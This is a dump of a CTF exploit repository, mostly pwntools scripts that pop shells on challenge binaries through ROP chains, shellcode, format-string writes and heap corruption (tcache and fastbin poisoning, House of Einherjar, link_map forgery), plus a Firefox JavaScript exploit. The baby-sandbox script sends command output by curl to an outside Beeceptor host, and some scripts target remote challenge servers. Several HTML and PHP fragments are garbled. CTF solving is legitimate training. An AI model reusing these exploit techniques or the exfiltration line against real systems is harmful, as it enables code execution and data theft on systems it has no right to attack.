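payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
payload = payload.ljust(32, "a")
# The format string starts 32 bytes (8 slots) into buf, hence offset 7 + 8;
# numbwritten accounts for the shellcode bytes printf has already echoed.
payload += fmtstr_payload(7 + 8, writes, write_size='int', numbwritten=len(payload))
log.info("Payload: " + payload)
p.sendline(payload)

p.interactive()
-------------------------------------------------------------------------------- /defcon-2015/r0pbaby/exploit.py: --------------------------------------------------------------------------------
from pwn import *

context.arch = 'amd64'
# context.log_level = 'debug'

p = process("r0pbaby")

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
bin_sh_offset = next(libc.search("/bin/sh"))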
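pop_rdi_gadget_offset = next(libc.search(asm("pop rdi; ret")))
system_offset = libc.symbols['system']


def get_libc_base_address():
    """Menu 1: ask the program for libc's base ("...so.6: <hex>"). Unused below."""
    p.sendline("1")
    p.recvuntil(".so.6: ")
    addr = p.recvline().strip()
    return int(addr, 16)


def get_libc_func_address(func):
    """Menu 2: ask the program to resolve `func` and return the address it prints."""
    p.sendline("2")
    p.recvuntil("symbol: ")
    p.sendline(func)
    p.recvuntil(": ")
    addr = p.recvline().strip()
    return int(addr, 16)


def send_payload(payload):
    """Menu 3: send `payload` preceded by its length, as the program expects."""
    p.sendline("3")
    p.sendline(str(len(payload)))
    p.send(payload)


system_addr = get_libc_func_address("system")

# Every offset comes from the libc loaded above, so the chain is only correct
# when the target runs the very same build; the read() cross-check below makes
# a mismatch visible in the log before the chain is sent.
libc_base_addr = system_addr - system_offset

log.info("Calculated read_addr: " + str(hex(libc_base_addr + libc.symbols['read'])))
log.info("Actual read addr: " + str(hex(get_libc_func_address("read"))))

payload = "a"*8 # saved RBP (amd64) - filler before the return address
payload += p64(libc_base_addr + pop_rdi_gadget_offset)
payload += p64(libc_base_addr + bin_sh_offset)
payload += p64(libc_base_addr + system_offset)

send_payload(payload)

# Menu 4 presumably leaves the loop, so the function returns into the chain.
p.sendline("4")

p.interactive()
-------------------------------------------------------------------------------- /meepwn-2018/baby-sandbox/exploit.py: --------------------------------------------------------------------------------
import base64

from pwn import *

context.terminal = ['tmux', 'split', '-h']

p = process("./baby-sandbox")

prefix = asm("mov edx, eax") # Saving address of payload

# Reference for the hand-assembled `cond` bytes below.
"""
register int esp asm("esp");
if ((esp >= (0x1000000 + 0x200000)) &&
    (esp <= (0x1000000 + 0x200100)) ) {
    asm("mov $1, %eax");
    asm("int $0x80");
}

"""
# push ebp; mov ebp,esp; compare esp against 0x011fffff / 0x01200100 and
# exit(1) via int 0x80 when it lies inside that window; nop; pop ebp.
# Presumably the byte pattern the sandbox insists on — keep the bytes exact
# rather than re-assembling them.
cond = "\x55\x89\xe5\x89\xe0\x3d\xff\xff\x1f" + \
       "\x01\x7e\x10\x89\xe0\x3d\x00\x01\x20" + \
       "\x01\x7f\x07\xb8\x01\x00\x00\x00\xcd" + \
       "\x80\x90\x5d"

# execve("/bin/sh", ["/bin/sh", "-c", command, NULL], NULL) with the strings
# taken from payload+0x50 (edx still holds the payload address from `prefix`):
# +0x50 "/bin/sh\0" (8 bytes), +0x58 "-c\0" (3 bytes), +0x5b the command.
execve = asm("""
    mov eax, 0xb;
    add edx, 0x50;
    mov ebx, edx;

    mov [esp], edx;
    add edx, 8;
    add esp, 4;
    mov [esp], edx;
    add edx, 3;
    add esp, 4;
    mov [esp], edx;
    add esp, 4;
    xor edx, edx;
    mov [esp], edx;
    sub esp, 12;

    mov ecx, esp;
    int 0x80;
"""
)

payload = (prefix + cond + execve).ljust(0x50, "\x00")
payload += "/bin/sh\x00"
payload += "-c\x00"

command = "ls"

# NOTE(review): this ships the command's output over plain HTTP to a public
# Beeceptor endpoint. Anyone who knows or guesses that subdomain can read it and
# the traffic is unencrypted on the wire; for anything beyond a throwaway CTF
# run, point this at a listener you control, over HTTPS.
payload += "curl -XPOST http://vampire.proxy.beeceptor.com --data \"$(" + \
           command + \
           ")\""

# Explicit import above: the script previously relied on `from pwn import *`
# happening to re-export the base64 module.
if len(payload) > 0x100:
    print("Too much")
else:
    print(base64.b64encode(payload))

# NOTE(review): the size check only prints; an over-long payload is still sent.
p.send(payload)

p.interactive()

-------------------------------------------------------------------------------- /codegate-2018/rbSql/5f0c2baaa2c0426eed9a958e3fe0ff94.php: -------------------------------------------------------------------------------- 1 | alert('{$msg}');history.go(-1);"); 4 | } 5 | ?> 6 | 7 | 8 | Krystal Fan Site krybiya.kr 9 | 10 | 11 | 12 | 13 |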
14 | 18 | 25 |
 
26 | 36 |
37 | 38 | -------------------------------------------------------------------------------- /hacklu-2014/oreo/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./oreo" 7 | bin = ELF(file) 8 | libc = ELF("/lib/i386-linux-gnu/libc.so.6") 9 | 10 | conn = process(file) 11 | #gdb.attach(conn) 12 | 13 | def menu(choice): 14 | # conn.recvuntil("Exit") 15 | conn.sendline(str(choice)) 16 | 17 | def add(name, description): 18 | menu(1) 19 | #conn.recvuntil("name") 20 | conn.sendline(name) 21 | #conn.recvuntil("description") 22 | conn.sendline(description) 23 | 24 | def show(): 25 | menu(2) 26 | 27 | def order(): 28 | menu(3) 29 | 30 | def leave_msg(message): 31 | menu(4) 32 | #conn.recvuntil("submit with your order:") 33 | conn.sendline(message) 34 | 35 | def stats(): 36 | menu(5) 37 | 38 | # Leaking libc 39 | add("a"*27 + p32(bin.symbols['stdin']), "bb") 40 | show() 41 | conn.recvuntil("Description:") 42 | conn.recvuntil("Description: ") 43 | libc_leak = u32(conn.recvn(4)) 44 | libc.address = libc_leak - 0xf772e5a0 + 0xf757c000 45 | log.info(hex(libc_leak)) 46 | log.info("Libc base: " + hex(libc.address)) 47 | 48 | # Creating a fastbin at rifle_count 49 | for i in range(0x38 + 7): 50 | add("a", "b") 51 | add("a"*27 + p32(0x0804A2A8), "b") 52 | leave_msg("\x00"*0x20 + p32(0) + p32(0x41)) 53 | order() 54 | add("a", p32(bin.got['free'])) 55 | leave_msg(p32(libc.symbols['system']) + p32(libc.symbols['fgets'])) 56 | add("def", "/bin/sh") 57 | order() 58 | 59 | conn.interactive() 60 | -------------------------------------------------------------------------------- /fireshell-2019/quotes_list/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | name = "./quotes_list" 
7 | bin = ELF(name) 8 | libc = ELF("./libc.so.6") 9 | 10 | conn = process(name) 11 | gdb.attach(conn) 12 | 13 | def menu(ch, idx = None): 14 | conn.recvuntil("Exit") 15 | conn.sendline(str(ch)) 16 | if idx is not None: 17 | conn.recvuntil("Index: ") 18 | conn.sendline(str(idx)) 19 | 20 | def create(l, content): 21 | menu(1) 22 | conn.recvuntil("Length:") 23 | conn.sendline(str(l)) 24 | conn.recvuntil("Content: ") 25 | conn.send(content) 26 | 27 | def edit(idx, content): 28 | menu(2, idx) 29 | conn.recvuntil("Content: ") 30 | conn.send(content) 31 | 32 | def show(idx): 33 | menu(3, idx) 34 | conn.recvuntil("Quote: ") 35 | 36 | def delete(idx): 37 | menu(4, idx) 38 | 39 | # Leaking libc 40 | create(0x3000, "a") 41 | create(0x3000, "b") 42 | delete(0) 43 | create(0x3000, "a"*8) 44 | 45 | show(0) 46 | conn.recvn(8) 47 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 48 | libc.address = libc_leak - 0x7fea1a8d5ca0 + 0x7fea1a527000 49 | 50 | delete(0) 51 | delete(1) 52 | 53 | # tcache poison 54 | create(0x28, "a") # 0 55 | create(0x28, "b") # 1 56 | create(0x38, "c") # 2 57 | edit(0, "a"*0x28 + "\x51") 58 | delete(1) 59 | delete(2) 60 | create(0x48, "\x00"*8*5 + p64(0x41) + p64(libc.symbols['__free_hook'])) # 1 61 | create(0x38, "/bin/sh\x00") # 2 62 | create(0x38, p64(libc.symbols['system'])) # 3 63 | 64 | delete(2) 65 | 66 | log.info("Libc leak: " + hex(libc_leak)) 67 | 68 | conn.interactive() 69 | -------------------------------------------------------------------------------- /codegate-2018/zoo/helper.py: -------------------------------------------------------------------------------- 1 | import gdb 2 | 3 | last_size = None 4 | malloc_map = {} 5 | 6 | def ExprAsInt(expr): 7 | return int(str(gdb.parse_and_eval("(void*)(%s)" % expr)).split(" ")[0], 16) 8 | 9 | class MallocFinishBreakpoint(gdb.FinishBreakpoint): 10 | def __init__ (self): 11 | gdb.FinishBreakpoint.__init__( 12 | self, 13 | gdb.newest_frame(), 14 | internal=True, 15 | ) 16 | self.silent = True 17 | 18 | def 
stop(self): 19 | where = ExprAsInt('$rax') 20 | print("0x%.8x <---- malloc of 0x%x bytes" % (where, last_size)) 21 | 22 | if where in malloc_map: 23 | print("[!] where already in malloc map") 24 | malloc_map[where] = last_size 25 | 26 | return False 27 | 28 | class MallocBreakpoint(gdb.Breakpoint): 29 | def __init__(self): 30 | gdb.Breakpoint.__init__(self, 'malloc', internal=True) 31 | self.silent = True 32 | 33 | def stop(self): 34 | global last_size 35 | last_size = ExprAsInt('$rdi') 36 | MallocFinishBreakpoint() 37 | 38 | return False 39 | 40 | class FreeBreakpoint(gdb.Breakpoint): 41 | def __init__ (self): 42 | gdb.Breakpoint.__init__(self, 'free', internal=True) 43 | self.silent = True 44 | 45 | def stop(self): 46 | where = ExprAsInt('$rdi') 47 | if where in malloc_map: 48 | print("0x%.8x <---- free of 0x%x bytes" % (where, malloc_map[where])) 49 | del malloc_map[where] 50 | else: 51 | print("0x%.8x <---- free (not in malloc map?!)" % where) 52 | 53 | MallocBreakpoint() 54 | FreeBreakpoint() 55 | -------------------------------------------------------------------------------- /codegate-2019/god-the-reum/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | name = "./god-the-reum" 7 | bin = ELF(name) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc-2.27.so") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.27.so")} 12 | 13 | conn = process(name, env=env) 14 | #gdb.attach(conn) 15 | 16 | def menu(ch, idx = None): 17 | conn.recvuntil("select your choice : ") 18 | conn.sendline(str(ch)) 19 | if idx is not None: 20 | conn.recvuntil("input wallet no :") 21 | conn.sendline(str(idx)) 22 | 23 | def create(size): 24 | menu(1) 25 | conn.recvuntil("how much initial eth") 26 | conn.sendline(str(size)) 27 | conn.recvuntil("Creating new wallet") 28 | 29 | def deposit(idx, money): 
30 | menu(2, idx) 31 | conn.recvuntil("how much deposit") 32 | conn.sendline(str(money)) 33 | 34 | def withdraw(idx, money): 35 | menu(3, idx) 36 | conn.recvuntil("how much") 37 | conn.sendline(str(money)) 38 | 39 | def show(): 40 | menu(4) 41 | 42 | def hid(idx, contents): 43 | menu(6, idx) 44 | conn.recvuntil("new eth :") 45 | conn.send(contents) 46 | 47 | # Leaking libc 48 | create(0x3000) # 0 49 | create(0x30) # 1 50 | withdraw(0, 0x3000) 51 | show() 52 | conn.recvuntil("0) addr") 53 | conn.recvuntil("ballance ") 54 | libc_leak = int(conn.recvline()[:-1]) 55 | libc.address = libc_leak - 0x7f072a20bca0 + 0x7f0729e20000 56 | 57 | withdraw(1, 0x30) 58 | hid(1, p64(libc.symbols['__free_hook']) + "\n") 59 | 60 | create(0x30) # 2 61 | create(0x30) # 3 62 | hid(3, p64(libc.address + 0x4f322) + "\n") 63 | #create(0x30) # 4 64 | withdraw(2, 0x30) 65 | 66 | log.info("Libc leak: " + hex(libc_leak)) 67 | 68 | conn.interactive() 69 | -------------------------------------------------------------------------------- /rctf-2018/stringer/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./stringer" 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 12 | 13 | #conn = process(file, env=env) 14 | conn = remote("stringer.2018.teamrois.cn", 7272) 15 | #gdb.attach(conn) 16 | 17 | def menu(ch): 18 | conn.recvuntil("choice:") 19 | conn.sendline(str(ch)) 20 | 21 | def new(size, content, shell=False): 22 | menu(1) 23 | conn.recvuntil("string length:") 24 | conn.sendline(str(size)) 25 | if shell: 26 | return 27 | conn.recvuntil("string content") 28 | conn.send(content) 29 | conn.recvuntil("your string: ") 30 | 31 | def edit(idx, idx2): 32 | menu(3) 33 | conn.recvuntil("the index:") 34 | 
conn.sendline(str(idx)) 35 | conn.recvuntil("byte index") 36 | conn.sendline(str(idx2)) 37 | 38 | def delete(idx): 39 | menu(4) 40 | conn.recvuntil("the index:") 41 | conn.sendline(str(idx)) 42 | 43 | # Libc leak 44 | new(0x98, "a\n") # 0 45 | new(0x98, "a\n") # 1 46 | new(0x98, "a\n") # 2 47 | delete(1) 48 | # Making freed chunk MMAPPED 49 | edit(0, 0x98) 50 | edit(0, 0x98) 51 | new(0x98, "a"*7 + "\n") # 3 52 | conn.recvuntil("a"*7 + "\n") 53 | 54 | libc_leak = u64(conn.recvn(6) + "\x00\x00") 55 | 56 | #libc.address = libc_leak - 0x7f91d76deb78 + 0x7f91d731a000 57 | libc.address = libc_leak - 0x7fd3eb190b78 + 0x7fd3eadcc000 58 | log.info("Libc leak: " + hex(libc_leak)) 59 | 60 | # Fastbin corruption 61 | new(0x60, "a\n") # 4 62 | new(0x60, "a\n") # 5 63 | delete(4) 64 | delete(5) 65 | delete(4) 66 | new(0x60, p64(libc.symbols['__malloc_hook'] - 0x23) + "\n") # 6 67 | new(0x60, "a\n") # 7 68 | new(0x60, "a\n") # 8 69 | new(0x60, "\x00"*0x13 + p64(libc.address + 0xf02a4) + "\n") 70 | 71 | new(0x10, "a", shell=True) 72 | 73 | conn.interactive() 74 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/order.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Jackie Stewart's Sapeurs Shop 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 | 28 |
29 | 30 |
31 | 32 |
33 |
34 |

The sapelogie prophet

35 | 36 |

Jackie Stewart

37 |

Real sapeurs know were to shop! You can buy everything here to look just like me!

38 |
39 |
40 | 41 |
42 | 43 | 44 |
Thank you for your order!!!
45 | 46 |
47 | 48 |
49 | 50 |
51 |
52 |

©Jackie Stewart. Gabao RPZ à point 0.

53 |
54 |
55 | 56 | 57 | -------------------------------------------------------------------------------- /blaze-ctf-2018/blazefox/exploit.js: -------------------------------------------------------------------------------- 1 | var jsp = new JSPack(); 2 | 3 | function lower(d) { 4 | return jsp.Unpack(">L>L", jsp.Pack("d", [d]))[1]; 5 | } 6 | 7 | function upper(d) { 8 | return jsp.Unpack(">L>L", jsp.Pack("d", [d]))[0]; 9 | } 10 | 11 | function double_to_ulong(d) { 12 | return upper(d)*0x100000000 + lower(d); 13 | } 14 | 15 | function ulong_to_double(n) { 16 | l = jsp.Pack(">L", [n%0x100000000]); 17 | u = jsp.Pack(">L", [n/0x100000000]); 18 | return jsp.Unpack("d", u.concat(l))[0]; 19 | } 20 | 21 | var leak_arr = new Array(2); 22 | 23 | // Markers to help us find array 24 | leak_arr[0] = 0x41424241; 25 | leak_arr[1] = 0x42434342; 26 | 27 | leak_arr.blaze(); 28 | 29 | alert("Leaking libxul"); 30 | var libxul_leak = double_to_ulong(leak_arr[5]); 31 | 32 | alert(libxul_leak.toString(16)); 33 | 34 | var arr = new Array(2); 35 | var typed_arr = new Uint32Array(0x10); 36 | 37 | arr[0] = 0x43444443; 38 | arr[1] = 0x44454544; 39 | typed_arr[0] = 0x45464645; 40 | typed_arr[1] = 0x46474746; 41 | 42 | arr.blaze(); 43 | 44 | function a_write(addr, value) { 45 | arr[9] = ulong_to_double(addr); 46 | typed_arr[0] = value % 0x100000000; 47 | typed_arr[1] = value / 0x100000000; 48 | } 49 | 50 | function a_read(addr) { 51 | arr[9] = ulong_to_double(addr); 52 | return typed_arr[0] + typed_arr[1]*0x100000000; 53 | } 54 | 55 | var libxul_base = libxul_leak - 0x7f8ab37a9fc0 + 0x7f8aac2d8000; 56 | var memmove_got = libxul_base + 0x88d24b0; 57 | 58 | var memmove_addr = a_read(memmove_got); 59 | 60 | alert("Memmove addr: " + memmove_addr.toString(16)); 61 | 62 | var libc_base = memmove_addr - 0x14d9b0; 63 | var system_addr = libc_base + 0x45390; 64 | 65 | var cmd = "/usr/bin/gnome-calculator &"; 66 | var target = new Uint8Array(200); 67 | 68 | for (var i = 0;ist_value = got of read 60 | symtab = 
p64(0) + \ 61 | p64(bin.got['read'] - 8) 62 | 63 | reloc = p64(0) + \ 64 | p64(RELOC_ADDR + 0x10) + \ 65 | p64(RELOC_ADDR + 0x100 - offset_system_from_read) + \ 66 | p64(7) 67 | 68 | a_write(OVERWRITE_ADDRESS, p64(LINKMAP_ADDR)) 69 | a_write(LINKMAP_ADDR, linkmap[:0x90]) 70 | a_write(LINKMAP_ADDR + 0x90, linkmap[0x90:]) 71 | a_write(SYMTAB_ADDR, symtab) 72 | a_write(RELOC_ADDR, reloc) 73 | pause() 74 | 75 | # Freeing 76 | delete(2) 77 | 78 | conn.interactive() 79 | -------------------------------------------------------------------------------- /0ctf-quals-2017/babyheap/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./babyheap" 7 | 8 | bin = ELF(file) 9 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 10 | 11 | conn = process(file) 12 | #gdb.attach(conn) 13 | 14 | def a(size, shell=True): 15 | conn.recvuntil("Command: ") 16 | conn.sendline("1") 17 | conn.recvuntil("Size: ") 18 | conn.sendline(str(size)) 19 | if shell: 20 | return 21 | conn.recvuntil("Allocate Index") 22 | 23 | def fill(index, content, size = None): 24 | conn.recvuntil("Command: ") 25 | conn.sendline("2") 26 | conn.recvuntil("Index: ") 27 | conn.sendline(str(index)) 28 | conn.recvuntil("Size: ") 29 | if size is None: 30 | conn.sendline(str(len(content))) 31 | else: 32 | conn.sendline(str(size)) 33 | conn.recvuntil("Content: ") 34 | conn.send(content) 35 | 36 | def f(index): 37 | conn.recvuntil("Command: ") 38 | conn.sendline("3") 39 | conn.recvuntil("Index: ") 40 | conn.sendline(str(index)) 41 | 42 | def d(index): 43 | conn.recvuntil("Command: ") 44 | conn.sendline("4") 45 | conn.recvuntil("Index: ") 46 | conn.sendline(str(index)) 47 | conn.recvuntil("Content: \n") 48 | 49 | # House of Einherjar - getting libc leak 50 | 51 | a(0x100) # 0 52 | a(0x100) # 1 53 | a(0x100) # 2 54 | 55 | a(0x100) # 3 56 | 57 | f(0) 58 | 59 | payload = 
"\x00"*0x100 + p64(0x220) + p64(0x110) 60 | fill(1, payload) 61 | f(2) 62 | 63 | a(0x100) # 0 64 | a(0x100) # 2 65 | f(2) 66 | d(1) 67 | 68 | libc_leak = u64(conn.recvn(8)) 69 | libc.address = libc_leak - 0x7f56d1f6ab78+ 0x7f56d1ba6000 70 | 71 | # Clean the heap 72 | f(0) 73 | f(3) 74 | # Now, only 1 chunk is reserved 75 | 76 | # Fastbin corruption 77 | a(0x60) # 0 78 | a(0x60) # 2 79 | f(2) 80 | 81 | payload = "\x00"*0x68 + p64(0x71) + p64(libc.symbols['__malloc_hook'] - 0x23) 82 | fill(0, payload) 83 | a(0x60) # 2 84 | a(0x60) # 3 85 | 86 | payload = "\x00"*0x13 + p64(libc.address + 0x4526a) # one_gadget 87 | fill(3, payload) 88 | 89 | a(0x60, shell=True) 90 | 91 | log.info("Libc leak: " + hex(libc_leak)) 92 | 93 | conn.interactive() 94 | -------------------------------------------------------------------------------- /hitcon-2015/blinkroot/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.arch = "amd64" 4 | 5 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 6 | bin = ELF("./blinkroot") 7 | 8 | offset_system = libc.symbols['system'] 9 | offset_read = libc.symbols['read'] 10 | offset_system -= offset_read; # Offset of system from read 11 | 12 | DATA_ADDR = bin.symbols["data"] 13 | LOAD_ADDRESS = offset_system 14 | LINKMAP_ADDR = DATA_ADDR + 0x10 15 | STRTAB_OFFSET = 0x180 16 | STRTAB_ADDR = LINKMAP_ADDR + STRTAB_OFFSET 17 | SYMTAB_OFFSET = 0x100 18 | SYMTAB_ADDR = LINKMAP_ADDR + SYMTAB_OFFSET 19 | RELOC_OFFSET = 0x140 20 | RELOC_ADDR = LINKMAP_ADDR + RELOC_OFFSET 21 | 22 | PUTS_RELOC_INDEX = 1 23 | 24 | OVERWRITE_ADDRESS = 0x600B48 # Where link_map ptr is stored in GOT 25 | OVERWRITE_VALUE = LINKMAP_ADDR # The prev 8 bytes will be 0x10 26 | PAYLOAD_LEN = 0x400 27 | 28 | COMMAND = "; touch pwned" 29 | 30 | conn = process("./blinkroot") 31 | #gdb.attach(conn) 32 | 33 | ## Internal structures 34 | 35 | linkmap = "" 36 | linkmap += p64(LOAD_ADDRESS, sign='signed') 37 | linkmap += 
COMMAND.ljust(0x60, "\x00") 38 | linkmap += p64(STRTAB_ADDR) # Some valid address so that d_ptr can be retrieved 39 | linkmap += p64(SYMTAB_ADDR) 40 | linkmap += p64(0)*16 41 | linkmap += p64(RELOC_ADDR) 42 | linkmap = linkmap.ljust(SYMTAB_OFFSET, "\x00") 43 | 44 | symtab = "" 45 | symtab += p64(0) # Tag 46 | symtab += p64(bin.got['read'] - 8) # So sym->st_value points to 'read' in GOT 47 | symtab += p64(0) 48 | symtab = symtab.ljust(RELOC_OFFSET - SYMTAB_OFFSET, "\x00") 49 | 50 | reloc = "" 51 | reloc += p64(0) # Tag 52 | reloc += p64(RELOC_ADDR + 0x10 - PUTS_RELOC_INDEX *0x18) # PTR to relocation table 53 | # Relocation entry 54 | reloc += p64(bin.symbols['data'] - offset_system) # Some random address with write access 55 | reloc += p64(7) # type = JMP_REL and symbol table index = 0, points to first entry in our crafted symbol table, i.e. read 56 | # Padding 57 | reloc = reloc.ljust(STRTAB_OFFSET - RELOC_OFFSET, "\x00") 58 | 59 | payload = p64(OVERWRITE_ADDRESS - DATA_ADDR - 0x8, sign="signed") 60 | payload += p64(OVERWRITE_VALUE) 61 | payload += linkmap + symtab + reloc 62 | payload = payload.ljust(PAYLOAD_LEN, '\x00') 63 | 64 | conn.sendline(payload) 65 | conn.interactive() 66 | -------------------------------------------------------------------------------- /hacklu-2017/heapheaven/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | context.log_level = 'debug' 4 | 5 | file = "./HeapHeaven" 6 | 7 | libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 8 | bin = ELF(file) 9 | 10 | conn = process(file) 11 | #conn = gdb.debug(file) 12 | 13 | def get_num(n): 14 | s = "" 15 | while n != 0: 16 | if n % 2 != 0: 17 | s = "wi" + s 18 | n = (n-1)/2 19 | else: 20 | s = "wa" + s 21 | n /= 2 22 | s = s.ljust(128, "\x00") 23 | return s 24 | 25 | def malloc(size): 26 | conn.recvuntil("NOM-NOM\n") 27 | conn.sendline("whaa!") 28 | conn.recvuntil("ing...\n"); 29 | conn.sendline(get_num(size)) 30 | 31 | def 
display(offset): 32 | conn.recvuntil("NOM-NOM\n") 33 | conn.sendline("mommy?") 34 | conn.sendline(get_num(offset)) 35 | conn.recvuntil(": ") 36 | return conn.recvline()[:-1] 37 | 38 | def spill(offset, str): 39 | conn.recvuntil("NOM-NOM\n") 40 | conn.sendline("") 41 | conn.recvuntil("doing?\n") 42 | conn.sendline(get_num(offset)) 43 | conn.recvuntil("ing!\n") 44 | conn.sendline(str) 45 | 46 | def free(offset): 47 | conn.recvuntil("NOM-NOM\n") 48 | conn.sendline("NOM-NOM") 49 | conn.sendline(get_num(offset)) 50 | 51 | # Leaking libc address for base of unsorted bin 52 | # Initially: 0 53 | malloc(0x10) # 0 16 54 | malloc(400) # 0 16 400 55 | malloc(0x10) # 0 16 400 16 56 | free(0x40) # 0 16 [400] 16 57 | malloc(400) # 0 16 400 16 58 | 59 | usort_addr = u64(display(0x40)[0:6] + "\x00\x00") 60 | system_addr = 0x7f51f26fe390 - 0x007f51f2a7db78 + usort_addr 61 | free_hook_addr = system_addr - libc.symbols['system'] \ 62 | + libc.symbols['__free_hook'] 63 | 64 | # Let's leak heap's address, free the fastbins and see fd pointer 65 | free(0x20) # 0 [16] 400 16 66 | free(0x1e0) # 0 [16] 400 [16] 67 | 68 | str = display(0x1e0)[0:6] 69 | log.info(str.encode('hex')) 70 | 71 | log.info(len(str)) 72 | happ_addr = u64(str + "\x00\x00") - 0x10 73 | 74 | log.info("Heap_addr: " + p64(happ_addr)[::-1].encode('hex')) 75 | 76 | offset_free_hook = free_hook_addr - happ_addr 77 | 78 | spill(0, "/bin/sh") 79 | spill(offset_free_hook, p64(system_addr)) 80 | free(0) 81 | 82 | conn.interactive() 83 | 84 | -------------------------------------------------------------------------------- /insomni-hack-18/sapeloshop/header.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | Jackie Stewart's Sapeurs Shop 10 | 11 | 12 | 13 | 14 | 15 | 16 | 30 | 31 | 32 | 33 | 34 |
35 | 42 |
43 | 44 |
45 | 46 |
47 |
48 |

The sapelogie prophet

49 | 50 |

Jackie Stewart

51 |

Real sapeurs know were to shop! You can buy everything here to look just like me!

52 |
53 |
54 | 55 |
56 | 57 | 58 | 59 |
-------------------------------------------------------------------------------- /n1ctf-2018/vote/exploit.py: --------------------------------------------------------------------------------
from pwn import *
import time

context.log_level = "debug"
context.terminal = ['tmux', 'splitw', '-h']

bin = ELF('./vote')
libc = ELF('./libc-2.23.so')
#libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

# Local runs load the challenge-provided libc so the offsets below match it.
env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc-2.23.so")}

#conn = process('./vote', env=env)
#gdb.attach(conn)

# Event infrastructure address; use the process() line above for a local run.
conn = remote("47.97.190.1", 6000)


def menu(choice):
    """Wait for the "Action: " prompt and answer it with `choice`."""
    conn.recvuntil("Action: ")
    conn.sendline(str(choice))


def _answer(prompt, value):
    """Wait for `prompt`, then reply with `value` followed by a newline."""
    conn.recvuntil(prompt)
    conn.sendline(str(value))


def create(size, name, shell=False):
    """Menu 0: allocate a candidate of `size` bytes and send `name` raw.

    With shell=True the name prompt is never answered: used for the final
    allocation, which is expected to hand over a shell instead of asking.
    """
    menu(0)
    _answer("size: ", size)
    if shell:
        return
    conn.recvuntil("name: ")
    conn.send(name)


def show(index):
    """Menu 1: print the candidate stored at `index`."""
    menu(1)
    _answer("index: ", index)


def vote(index):
    """Menu 2: add one vote to the candidate at `index`."""
    menu(2)
    _answer("index: ", index)


def result():
    """Menu 3: print the results (unused by the sequence below)."""
    menu(3)


def cancel(index):
    """Menu 4: free the candidate at `index`."""
    menu(4)
    _answer("index: ", index)


def exit():
    """Menu 5: quit the program. Shadows the builtin; name kept for callers."""
    menu(5)


msize = 0x7f

create(msize, "a\n") # 0
create(msize, "b\n") # 1

cancel(0)

# The freed candidate can still be shown; its "count" field (printed in
# decimal) presumably now holds the freed chunk's fd pointer into libc.
show(0)
conn.recvuntil("count: ")
libc_leak = int(conn.recvline().strip())
#libc.address = libc_leak - 0x7f98fa34db78 + 0x7f98f9f89000
# Constant distance from the leaked pointer to libc base as observed with the
# provided libc-2.23 (0x3c4b78, presumably main_arena+88) — re-measure for any
# other build.
libc.address = libc_leak - (0x7f4a8c9dab78 - 0x7f4a8c616000)

log.info("Libc leak: " + hex(libc_leak))

# Fastbin corruption
# Target the usual misaligned fake chunk just below __malloc_hook — TODO
# confirm its size byte is valid for this libc.
fake_fd = libc.symbols['__malloc_hook'] - 0x23
payload = "".join([p64(0), p64(0x70), p64(fake_fd), "\n"])
create(0x60 - 0x10, payload) # 2
create(0x60 - 0x10, "b\n") # 3

cancel(2)
cancel(3)
log.info(hex(fake_fd))

79 | for i in range(0x10 + 0x10): 80 | vote(3) 81 | 82 | create(0x60 - 0x10, "a\n") # 4 83 | create(0x60 - 0x10, "b\n") # 5 84 | 85 | one_gadget = libc.address + 0xf0274 86 | payload = "\x00"*(0x23 - 0x10 - 0x10) + p64(one_gadget) + "\n" 87 | 88 | create(0x60 - 0x10, payload) 89 | 90 | create(0x10, "a\n", shell=True) # 6 91 | 92 | conn.sendline("ls; cat flag") 93 | 94 | conn.interactive() 95 | -------------------------------------------------------------------------------- /rctf-2017/rnote2/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #context.log_level = 'debug' 4 | context.terminal = ['tmux', 'splitw', '-h'] 5 | 6 | file = "./RNote2" 7 | bin = ELF(file) 8 | #libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 9 | libc = ELF("./libc.so.6") 10 | 11 | env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./libc.so.6")} 12 | 13 | conn = process(file, env=env) 14 | #gdb.attach(conn) 15 | 16 | def menu(ch): 17 | conn.recvuntil("choice:") 18 | conn.sendline(str(ch)) 19 | 20 | def add(size, content): 21 | menu(1) 22 | conn.recvuntil("length:") 23 | conn.sendline(str(size)) 